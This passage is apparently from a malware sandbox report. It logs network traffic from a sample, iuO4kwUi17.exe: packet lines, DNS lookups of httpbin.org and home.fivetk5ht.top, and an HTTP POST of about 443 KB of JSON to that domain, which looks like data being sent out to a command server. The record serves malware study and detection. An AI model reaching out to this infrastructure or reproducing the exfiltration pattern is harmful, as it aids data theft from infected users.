                                  Dec 20, 2024 17:06:04.658354998 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658390999 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658477068 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658482075 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658624887 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658629894 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658644915 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658690929 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658770084 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658818960 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658936977 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659018040 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659022093 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659034967 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659126043 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659131050 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659143925 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659249067 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659252882 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659262896 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659696102 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659709930 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659805059 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659809113 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659905910 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659914970 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.659944057 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660031080 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660036087 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660044909 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660121918 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660128117 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660228014 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660274982 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660398006 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660406113 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660552025 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660617113 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660698891 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660749912 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660753965 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660881042 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660887957 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.660897017 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661030054 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661140919 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661145926 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661149979 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661205053 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661210060 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661304951 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661309004 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661375046 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661406040 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661498070 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661609888 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661679029 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661685944 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661721945 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661725998 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661778927 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661783934 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661889076 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661892891 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.661978006 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662043095 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662046909 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662051916 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662128925 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662132978 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662172079 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662255049 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662260056 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.662270069 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.701884031 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.702059984 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.898313999 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.017827988 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.017925024 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.018310070 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.138113022 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138187885 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.138246059 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138251066 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138299942 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.138668060 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138720989 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.138751030 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138756037 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138798952 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.138902903 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.138947964 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.139064074 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.139069080 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.139076948 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.139112949 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.139131069 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.257941008 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.257966042 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.257976055 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.258037090 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.258096933 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.258130074 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.258140087 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.258193016 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.258210897 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.258326054 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.302469969 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.302628994 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.422367096 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.422468901 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.466473103 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.466559887 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.582847118 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.666446924 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.666558027 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:05.914498091 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:05.914671898 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.003012896 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.003181934 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.003262997 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.034394026 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.034526110 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123585939 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123605013 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123610020 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123677015 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123681068 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123717070 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123744011 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123801947 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123812914 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123822927 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123846054 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123864889 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123886108 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.123903990 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.123950005 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.126137972 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.126224041 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.127804041 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.154227972 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.154258013 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.154316902 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.154340029 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.243410110 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243505001 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243515968 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243527889 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.243541956 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243573904 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.243611097 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243623018 CET4970580192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:06.243774891 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243786097 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.243803978 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246031046 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246119022 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246220112 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246244907 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246315002 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246325016 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246359110 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246459961 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246469975 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.246742010 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.247375011 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.247385025 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:06.247471094 CET8049705185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221676111 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221829891 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221839905 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221848965 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.222347021 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.222527027 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225508928 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225528002 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225538015 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225547075 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225693941 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225703955 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225831985 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225989103 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226000071 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226011038 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226146936 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226164103 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226278067 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226289034 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226298094 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226309061 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226321936 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226454020 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226784945 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226794958 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226804972 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226815939 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226825953 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227485895 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227660894 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227797985 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227807999 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228593111 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228595972 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228600979 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228884935 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228895903 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228904963 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228918076 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229034901 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229190111 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229199886 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229347944 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229362965 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229516983 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229527950 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229670048 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229685068 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229820967 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229840040 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229851961 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230001926 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230010986 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230171919 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230489016 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230642080 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230653048 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230663061 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230792046 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.231859922 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.231973886 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.231992960 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.232002974 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.233019114 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.233030081 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234006882 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234016895 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234146118 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234167099 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234285116 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235215902 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235225916 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235375881 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235513926 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236484051 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236555099 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236565113 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236574888 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236736059 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237108946 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237118959 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237234116 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237308979 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238214016 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238224030 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238432884 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238442898 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238456964 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238466978 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239355087 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239515066 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239660978 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239670992 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240567923 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240577936 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240587950 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240603924 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240716934 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241729975 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241739988 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241905928 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241916895 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243040085 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243050098 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243058920 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243201971 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243211985 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244256020 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244266033 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244275093 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244285107 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244430065 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244461060 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244638920 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.272460938 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.272748947 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.480703115 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:08.600603104 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.600684881 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:08.600967884 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:08.721672058 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:09.874078989 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:09.874188900 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:09.874320030 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:09.874543905 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:09.994041920 CET8049708185.121.15.192192.168.2.10
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Dec 20, 2024 17:05:59.259493113 CET | 192.168.2.10 | 1.1.1.1 | 0xdf6f | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:05:59.259615898 CET | 192.168.2.10 | 1.1.1.1 | 0x8e84 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                  Dec 20, 2024 17:06:02.752289057 CET | 192.168.2.10 | 1.1.1.1 | 0xfc9f | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:02.752363920 CET | 192.168.2.10 | 1.1.1.1 | 0x24cf | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
                                  Dec 20, 2024 17:06:04.755788088 CET | 192.168.2.10 | 1.1.1.1 | 0x2cb4 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:04.755841970 CET | 192.168.2.10 | 1.1.1.1 | 0xff1e | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
                                  Dec 20, 2024 17:06:06.580580950 CET | 192.168.2.10 | 1.1.1.1 | 0x10bb | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:06.580647945 CET | 192.168.2.10 | 1.1.1.1 | 0x8fa0 | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
                                  Dec 20, 2024 17:06:08.341047049 CET | 192.168.2.10 | 1.1.1.1 | 0x678c | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:08.341176033 CET | 192.168.2.10 | 1.1.1.1 | 0x2c43 | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Dec 20, 2024 17:05:59.397278070 CET | 1.1.1.1 | 192.168.2.10 | 0xdf6f | No error (0) | httpbin.org |  | 98.85.100.80 | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:05:59.397278070 CET | 1.1.1.1 | 192.168.2.10 | 0xdf6f | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:02.891935110 CET | 1.1.1.1 | 192.168.2.10 | 0xfc9f | No error (0) | home.fivetk5ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:04.897389889 CET | 1.1.1.1 | 192.168.2.10 | 0x2cb4 | No error (0) | home.fivetk5ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:06.718673944 CET | 1.1.1.1 | 192.168.2.10 | 0x10bb | No error (0) | home.fivetk5ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                  Dec 20, 2024 17:06:08.479047060 CET | 1.1.1.1 | 192.168.2.10 | 0x678c | No error (0) | home.fivetk5ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                  • httpbin.org
                                  • home.fivetk5ht.top
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.10 | 49704 | 185.121.15.192 | 80 | 7280 | C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 20, 2024 17:06:03.307826996 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 443893
